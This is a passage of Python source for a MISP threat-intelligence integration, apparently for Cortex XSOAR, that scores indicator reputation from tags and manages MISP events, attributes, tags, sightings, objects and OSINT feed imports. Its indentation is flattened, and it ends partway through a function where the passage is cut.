def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
After getting all the attributes which match the required indicator value, this function parses the response.
This function goes over all the attributes that found (after limit the attributes amount to the given limit)
and by sub-functions calculated the score of the indicator.
For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and
galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects.
Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are
the newer ones.
Returns:
response (dict): The parsed outputs to context data (array of attributes).
score: the indicator score
found_tag: the tag (id) which made the indicator to get that score
found_related_events (dict): contains info (name, id, threat level id) about all the events that include
the indicator
Please see an example for a response in test_data/reputation_command_response.json
Please see an example for a parsed output in test_data/reputation_command_outputs.json
"""
response = copy.deepcopy(misp_response)
attributes_list = response.get('Attribute')
if not attributes_list:
return None
attributes_list = sorted(attributes_list,
key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]
found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)
attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)
score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,
malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)
formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})
return formatted_response, score, found_tag, found_related_events
def prepare_attributes_array_to_context_data(attributes_list):
attributes_tag_ids, event_tag_ids = set(), set()
found_related_events = {}
if not attributes_list:
return None
for attribute in attributes_list:
attribute.pop("RelatedAttribute") # get rid of this useless list
event = attribute.get('Event')
convert_timestamp_to_readable(attribute, event)
found_related_events[event.get("id")] = {"Event Name": event.get("info"),
"Threat Level ID": event.get('threat_level_id'),
"Event ID": event.get("id")}
if event.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)
event['Tag'] = limit_tag_output
event_tag_ids.update(tag_ids)
if attribute.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)
attribute['Tag'] = limit_tag_output
attributes_tag_ids.update(tag_ids)
return found_related_events, attributes_tag_ids, event_tag_ids
def convert_timestamp_to_readable(attribute, event):
if attribute.get('timestamp'):
attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))
if event:
if event.get('timestamp'):
attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))
if event.get('publish_timestamp'):
attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(
event.get('publish_timestamp'))
def found_event_with_bad_threat_level_id(found_related_events):
bad_threat_level_ids = ["1", "2", "3"]
for event in found_related_events.values():
if event['Threat Level ID'] in bad_threat_level_ids:
return True
return False
def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level):
"""
Calculates the indicator score by following logic. Indicators of attributes and Events that:
* have tags which configured as malicious will be scored 3 (i.e malicious).
* have tags which configured as suspicious will be scored 2 (i.e suspicious).
* don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In
such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.
note:
- In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will
be scored as malicious.
- Attributes tags (both malicious and suspicious) are stronger than events' tags.
"""
found_tag = None
is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)
if is_attribute_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)
if is_attribute_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)
if is_event_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)
if is_event_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
# no tag was found
if is_attribute_in_event_with_bad_threat_level:
return Common.DBotScore.BAD, None
return Common.DBotScore.NONE, None
def get_new_misp_event_object(args):
"""
Create a new MISP event object and set the event's details.
"""
event = MISPEvent()
event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]
threat_level_id_arg = args.get('threat_level_id')
if threat_level_id_arg:
event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]
analysis_arg = args.get('analysis')
event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg
event.info = args.get('info') if args.get('info') else 'Event from XSOAR'
event.date = datetime.today()
event.published = argToBoolean(args.get('published', 'False'))
return event
def create_event_command(demisto_args: dict):
"""Creating event in MISP with the given attribute args"""
new_event = get_new_misp_event_object(demisto_args)
new_event = PYMISP.add_event(new_event, True)
if isinstance(new_event, dict) and new_event.get('errors'):
raise DemistoException(new_event.get('errors'))
event_id = new_event.id
add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)
event = PYMISP.search(eventid=event_id)
human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(event),
raw_response=event
)
def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):
"""Adding attribute to a given MISP event object
This function can be called as an independence command or as part of another command (create event for example)
Args:
event_id (int): Event ID to add attribute to
internal (bool): if set to True, will not post results to Demisto
demisto_args (dict): Demisto args
new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to
that existing event.
"""
attributes_args = {
'id': demisto_args.get('event_id'), # misp event id
'type': demisto_args.get('type', 'other'),
'category': demisto_args.get('category', 'External analysis'),
'to_ids': argToBoolean(demisto_args.get('to_ids', True)),
'comment': demisto_args.get('comment'),
'value': demisto_args.get('value')
}
event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id")
attributes_args.update({'id': event_id}) if event_id else None
distribution = demisto_args.get('distribution')
attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None
if not new_event:
response = PYMISP.search(eventid=event_id, pythonify=True)
if not response:
raise DemistoException(
f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again")
new_event = response[0] # response[0] is MISP event
new_event.add_attribute(**attributes_args)
PYMISP.update_event(event=new_event)
if internal:
return
value = attributes_args.get('value')
updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)
human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(updated_event),
raw_response=updated_event
)
def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit):
reputation_value_list = argToList(demisto_args.get(reputation_type), ',')
command_results = []
for value in reputation_value_list:
command_results.append(
get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
return command_results
def reputation_value_validation(value, dbot_type):
if dbot_type == 'FILE':
# hashFormat will be used only in output
hash_format = get_hash_type(value)
if hash_format == 'Unknown':
raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')
if dbot_type == 'IP':
if not is_ip_valid(value):
raise DemistoException(f"Error: The given IP address: {value} is not valid")
if dbot_type == 'DOMAIN':
if not re.compile(DOMAIN_REGEX, regexFlags).match(value):
raise DemistoException(f"Error: The given domain: {value} is not valid")
if dbot_type == 'URL':
if not re.compile(urlRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given url: {value} is not valid")
if dbot_type == 'EMAIL':
if not re.compile(emailRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given email address: {value} is not valid")
def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):
"""
This function searches for the given attribute value in MISP and then calculates it's dbot score.
The score is calculated by the tags ids (attribute tags and event tags).
Args:
value (str): The indicator value (an IP address, email address, domain, url or file hash).
dbot_type (str): Indicator type (file, url, domain, email or ip).
malicious_tag_ids (set): Tag ids should be recognised as malicious.
suspicious_tag_ids (set): Tag ids should be recognised as suspicious
reliability (DBotScoreReliability): integration reliability score.
attributes_limit (int) : Limits the number of attributes that will be written to the context
Returns:
CommandResults includes all the indicator results.
"""
reputation_value_validation(value, dbot_type)
misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,
include_correlations=True, include_event_tags=True, enforce_warninglist=True,
include_decay_score=True, includeSightings=True)
indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]
is_indicator_found = misp_response and misp_response.get('Attribute')
if is_indicator_found:
outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,
malicious_tag_ids,
suspicious_tag_ids,
attributes_limit)
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=score, reliability=reliability, malicious_description="Match found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
all_attributes = outputs.get('Attribute')
events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)
attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)
readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,
removeNull=True)
readable_output += tableToMarkdown('Related events', list(found_related_events.values()))
return CommandResults(indicator=indicator,
raw_response=misp_response,
outputs=all_attributes,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
readable_output=readable_output)
else:
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=Common.DBotScore.NONE, reliability=reliability,
malicious_description="No results were found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
return CommandResults(indicator=indicator,
readable_output=f"No attributes found in MISP for value: {value}")
def get_events_related_to_scored_tag(all_attributes, found_tag):
"""
This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored
as malicious or suspicious.
Args:
all_attributes (dict): The parsed response from the MISP search attribute request
found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is
Unknown so no events should be found.
Returns:
list includes all the events that were detected as related to the tag.
"""
scored_events = []
if found_tag:
for attribute in all_attributes:
event = attribute.get('Event', {})
event_name = event.get('Info')
scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))
scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))
return remove_duplicated_related_events(scored_events)
def remove_duplicated_related_events(related_events):
related_events_no_duplicates = []
for i in range(len(related_events)):
if related_events[i] not in related_events[i + 1:]:
related_events_no_duplicates.append(related_events[i])
return related_events_no_duplicates
def search_events_with_scored_tag(object_data_dict, found_tag, event_name):
"""
By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be
added to related_events list
Args:
object_data_dict (dict): Event or attribute dict which includes tags list.
found_tag (str): The tag that was scored as malicious or suspicious.
event_name (str): Name of the event
"""
related_events = []
object_tags_list = object_data_dict.get('Tag', [])
for tag in object_tags_list:
if tag.get('ID') == found_tag:
event_id = get_event_id(object_data_dict)
tag_name = tag.get('Name')
related_events.append({'Event_ID': event_id, 'Event_Name': event_name,
'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})
return related_events
def get_event_id(data_dict):
if data_dict.get('EventID'):
return data_dict.get('EventID')
elif data_dict.get('ID'):
return data_dict.get('ID')
return data_dict.get('Event', {}).get('ID')
def get_dbot_indicator(dbot_type, dbot_score, value):
if dbot_type == "FILE":
hash_type = get_hash_type(value)
if hash_type == 'md5':
return Common.File(dbot_score=dbot_score, md5=value)
if hash_type == 'sha1':
return Common.File(dbot_score=dbot_score, sha1=value)
if hash_type == 'sha256':
return Common.File(dbot_score=dbot_score, sha256=value)
if dbot_type == "IP":
return Common.IP(ip=value, dbot_score=dbot_score)
if dbot_type == "DOMAIN":
return Common.Domain(domain=value, dbot_score=dbot_score)
if dbot_type == "EMAIL":
return Common.EMAIL(address=value, dbot_score=dbot_score)
if dbot_type == "URL":
return Common.URL(url=value, dbot_score=dbot_score)
def build_misp_complex_filter(demisto_query: str):
"""
Examples are available in UT: test_build_misp_complex_filter.
For more information please see build_complex_query in pymisp/api.py
Args:
demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:'
using ',' as delimiter for parameters and ';' as delimiter for operators.
using the operators is optional.
if 'demisto_query' does not contains any of the complex operators the original
input will be returned
Returns:
str: dictionary created for misp to perform complex query
or if no complex query found returns the original input
"""
regex_and = r'(AND:)([^\;]+)(;)?'
regex_or = r'(OR:)([^\;]+)(;)?'
regex_not = r'(NOT:)([^\;]+)(;)?'
misp_query_params = dict()
match_and = re.search(regex_and, demisto_query, re.MULTILINE)
match_or = re.search(regex_or, demisto_query, re.MULTILINE)
match_not = re.search(regex_not, demisto_query, re.MULTILINE)
is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')
is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')
is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')
is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator
if is_complex_search:
return PYMISP.build_complex_query(**misp_query_params)
return demisto_query
def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):
is_complex_search = False
if match_operator is not None:
misp_query_params[operator_key] = match_operator.group(2).split(',')
is_complex_search = True
return is_complex_search
def prepare_args_to_search(controller):
demisto_args = demisto.args()
args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}
# Replacing keys and values from Demisto to Misp's keys
if 'type' in args_to_misp_format:
args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')
if 'to_ids' in args_to_misp_format:
args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0
if 'from' in args_to_misp_format:
args_to_misp_format['date_from'] = args_to_misp_format.pop('from')
if 'to' in args_to_misp_format:
args_to_misp_format['date_to'] = args_to_misp_format.pop('to')
if 'event_id' in args_to_misp_format:
args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))
if 'last' in args_to_misp_format:
args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')
if 'include_decay_score' in args_to_misp_format:
args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0
if 'include_sightings' in args_to_misp_format:
args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0
if 'include_correlations' in args_to_misp_format:
args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0
if 'enforceWarninglist' in args_to_misp_format:
args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0
if 'include_feed_correlations' in args_to_misp_format:
args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(
'include_feed_correlations') == 'true' else 0
args_to_misp_format.pop('include_feed_correlations')
if 'limit' not in args_to_misp_format:
args_to_misp_format['limit'] = '50'
if 'tags' in args_to_misp_format:
args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])
args_to_misp_format['controller'] = controller
demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}")
return args_to_misp_format
def build_attributes_search_response(response: Union[dict, requests.Response],
include_correlations=False) -> dict:
"""
Convert the response of attribute search returned from MISP to the context output format.
"""
response_object = copy.deepcopy(response)
if include_correlations:
# return full related attributes only if the user wants to get them back
ATTRIBUTE_FIELDS.append('RelatedAttribute')
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return get_limit_attribute_search_outputs(attributes)
def get_limit_attribute_search_outputs(attributes):
for i in range(len(attributes)):
attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}
build_galaxy_output(attributes[i])
build_tag_output(attributes[i])
build_sighting_output_from_attribute_search_response(attributes[i])
convert_timestamp_to_readable(attributes[i], None)
formatted_attributes = replace_keys_from_misp_to_context_data(attributes)
return formatted_attributes
def build_galaxy_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Galaxy'):
given_object['Galaxy'] = [
{
'name': star.get('name'),
'type': star.get('type'),
'description': star.get('description')
} for star in given_object['Galaxy']
]
def build_object_output(event):
if event.get('Object'):
event['Object'] = [
{
'name': event_object.get('name'),
'uuid': event_object.get('uuid'),
'description': event_object.get('description'),
'id': event_object.get('id')
} for event_object in event['Object']
]
def build_tag_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Tag'):
given_object['Tag'] = [
{'Name': tag.get('name'),
'is_galaxy': tag.get('is_galaxy')
} for tag in given_object.get('Tag')
]
def build_sighting_output_from_attribute_search_response(attribute):
if attribute.get('Sighting'):
attribute['Sighting'] = [
{'type': sighting.get('type')
} for sighting in attribute.get('Sighting')
]
def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:
"""returns list of attributes' values that match the search query when user set the arg 'compact' to True"""
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return [attribute.get('value') for attribute in attributes]
def pagination_args_validation(page, limit):
if page and page < 0:
raise DemistoException("page should be zero or a positive number")
if limit and limit < 0:
raise DemistoException("limit should be zero or a positive number")
def attribute_response_to_markdown_table(response: dict):
attribute_highlights = []
for attribute in response:
event = attribute.get('Event', {})
attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(
'Tag') else None
attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in
attribute.get('Sighting')] if attribute.get('Sighting') else None
attribute_highlights.append({
'Attribute ID': attribute.get('ID'),
'Event ID': attribute.get('EventID'),
'Attribute Category': attribute.get('Category'),
'Attribute Type': attribute.get('Type'),
'Attribute Comment': attribute.get('Comment'),
'Attribute Value': attribute.get('Value'),
'Attribute Tags': attribute_tags,
'Attribute Sightings': attribute_sightings,
'To IDs': attribute.get('ToIDs'),
'Timestamp': attribute.get('Timestamp'),
'Event Info': event.get('Info'),
'Event Organization ID': event.get('OrganizationID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID')
})
return attribute_highlights
def search_attributes(demisto_args: dict) -> CommandResults:
"""Execute a MISP search over 'attributes'"""
args = prepare_args_to_search('attributes')
outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))
include_correlations = argToBoolean(demisto_args.get('include_correlations', False))
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
if outputs_should_include_only_values:
response_for_context = build_attributes_search_response_return_only_values(response)
number_of_results = len(response_for_context)
md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes",
response_for_context[:number_of_results], ["Value"])
else:
response_for_context = build_attributes_search_response(response, include_correlations)
attribute_highlights = attribute_response_to_markdown_table(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}",
attribute_highlights, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Attribute",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}")
def build_events_search_response(response: Union[dict, requests.Response]) -> dict:
"""
Convert the response of event search returned from MISP to the context output format.
please note: attributes are excluded from search-events output as the information is too big. User can use the
command search-attributes in order to get the information about the attributes.
"""
response_object = copy.deepcopy(response)
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
events = [event.get('Event') for event in response_object]
for i in range(0, len(events)):
# Filter object from keys in event_args
events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}
events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event
build_galaxy_output(events[i])
build_tag_output(events[i])
build_object_output(events[i])
events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))
events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))
formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore
return formatted_events # type: ignore
def event_to_human_readable_tag_list(event):
event_tags = event.get('Tag', [])
if event_tags:
return [tag.get('Name') for tag in event_tags]
def event_to_human_readable_galaxy_list(event):
event_galaxies = event.get('Galaxy', [])
if event_galaxies:
return [galaxy.get('Name') for galaxy in event.get('Galaxy')]
def event_to_human_readable_object_list(event):
event_objects = event.get('Object', [])
if event_objects:
return [event_object.get('ID') for event_object in event.get('Object')]
def event_to_human_readable(response: dict):
event_highlights = []
for event in response:
event_tags = event_to_human_readable_tag_list(event)
event_galaxies = event_to_human_readable_galaxy_list(event)
event_objects = event_to_human_readable_object_list(event)
event_highlights.append({
'Event ID': event.get('ID'),
'Event Tags': event_tags,
'Event Galaxies': event_galaxies,
'Event Objects': event_objects,
'Publish Timestamp': event.get('PublishTimestamp'),
'Event Info': event.get('Info'),
'Event Org ID': event.get('OrganizationID'),
'Event Orgc ID': event.get('OwnerOrganization.ID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID'),
})
return event_highlights
def search_events(demisto_args: dict) -> CommandResults:
"""
Execute a MISP search using the 'event' controller.
"""
args = prepare_args_to_search('events')
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
response_for_context = build_events_search_response(response)
event_outputs_to_human_readable = event_to_human_readable(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}",
event_outputs_to_human_readable, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Event",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}")
def delete_event(demisto_args: dict):
"""
Gets an event id and deletes it.
"""
event_id = demisto_args.get('event_id')
response = PYMISP.delete_event(event_id)
if 'errors' in response:
raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}')
else:
human_readable = f'Event {event_id} has been deleted'
return CommandResults(readable_output=human_readable, raw_response=response)
def add_tag(demisto_args: dict, is_attribute=False):
"""
Function will add tag to given UUID of event or attribute.
is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False).
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
PYMISP.tag(uuid, tag) # add the tag
except PyMISPError:
raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully added to event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def remove_tag(demisto_args: dict, is_attribute=False):
"""
Function will remove tag to given UUID of event or attribute.
is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's.
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
response = PYMISP.untag(uuid, tag)
if response and response.get('errors'):
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
except PyMISPError:
raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def add_sighting(demisto_args: dict):
"""Adds sighting to MISP attribute
"""
attribute_id = demisto_args.get('id')
attribute_uuid = demisto_args.get('uuid')
sighting_type = demisto_args['type'] # mandatory arg
att_id = attribute_id or attribute_uuid
if not att_id:
raise DemistoException('ID or UUID not specified')
sighting_args = {
'id': attribute_id,
'uuid': attribute_uuid,
'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]
}
sigh_obj = MISPSighting()
sigh_obj.from_dict(**sighting_args)
response = PYMISP.add_sighting(sigh_obj, att_id)
if response.get('message'):
raise DemistoException(f"An error was occurred: {response.get('message')}")
elif response.get('Sighting'):
human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}'
return CommandResults(readable_output=human_readable)
raise DemistoException(f"An error was occurred: {json.dumps(response)}")
def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
Test module.
"""
is_tag_list_valid(malicious_tag_ids)
is_tag_list_valid(suspicious_tag_ids)
if attributes_limit < 0:
raise DemistoException('Attribute limit has to be a positive number.')
response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')
if PYMISP._check_json_response(response):
return 'ok'
else:
raise DemistoException('MISP has not connected.')
def build_feed_url(demisto_args):
url = demisto_args.get('feed')
url = url[:-1] if url.endswith('/') else url
if PREDEFINED_FEEDS.get(url):
url = PREDEFINED_FEEDS[url].get('url') # type: ignore
return url
def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):
"""Gets an OSINT feed from url and publishing them to MISP
urls with feeds for example: https://www.misp-project.org/feeds/
feed format must be MISP.
"""
headers = {'Accept': 'application/json'}
url = build_feed_url(demisto_args)
osint_url = f'{url}/manifest.json'
limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True)
try:
uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()
events_ids = list() # type: List[Dict[str, int]]
for index, uri in enumerate(uri_list, 1):
response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()
misp_new_event = MISPEvent()
misp_new_event.load(response)
add_event_response = PYMISP.add_event(misp_new_event)
event_object = add_event_response.get('Event')
if event_object and 'id' in event_object:
events_ids.append({'ID': event_object['id']})
if limit == len(events_ids):
break
human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=events_ids,
)
except ValueError as e:
raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}')
def add_object(event_id: str, obj: MISPObject):
"""Sending object to MISP and returning outputs
Args:
obj: object to add to MISP
event_id: ID of event
"""
response = PYMISP.add_object(event_id, misp_object=obj)
if 'errors' in response:
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
for ref in obj.ObjectReference:
response = PYMISP.add_object_reference(ref)
for attribute in response.get('Object', {}).get('Attribute', []):
convert_timestamp_to_readable(attribute, None)
response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp'))
formatted_response = replace_keys_from_misp_to_context_data(response)
formatted_response.update({"ID": event_id})
human_readable = f'Object has been added to MISP event ID {event_id}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=formatted_response,
)
def add_file_object(demisto_args: dict):
entry_id = demisto_args.get('entry_id')
event_id = demisto_args.get('event_id')
file_path = demisto.getFilePath(entry_id).get('path')
obj = FileObject(file_path)
return add_object(event_id, obj)
def add_domain_object(demisto_args: dict):
"""Adds a domain object to MISP
domain-ip description: https://www.misp-project.org/objects.html#_domain_ip
"""
text = demisto_args.get('text')
event_id = demisto_args.get('event_id')
domain = demisto_args.get('name')
obj = MISPObject('domain-ip')
ips = argToList(demisto_args.get('ip'))
for ip in ips:
obj.add_attribute('ip', value=ip)
obj.add_attribute('domain', value=domain)
if text:
obj.add_attribute('text', value=text)
return add_object(event_id, obj)
def add_url_object(demisto_args: dict):
"""Building url object in MISP scheme
Scheme described https://www.misp-project.org/objects.html#_url
"""
url_args = [
'text',
'last_seen',
'first_seen'
]
event_id = demisto_args.get('event_id')
url = demisto_args.get('url')
url_parse = urlparse(url)
url_obj = [{'url': url}]
url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None
url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None
url_obj.append({'query_string': url_parse.query}) if url_parse.query else None
url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None
url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None
url_obj.append({'port': url_parse.port}) if url_parse.port else None
url_obj.append(
{'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None
url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args))
g_object = build_generic_object('url', url_obj)
return add_object(event_id, g_object)
def add_generic_object_command(demisto_args: dict):
event_id = demisto_args.get('event_id')
template = demisto_args.get('template')
attributes = demisto_args.get('attributes').replace("'", '"')
try:
args = json.loads(attributes)
if not isinstance(args, list):
args = dict_to_generic_object_format(args)
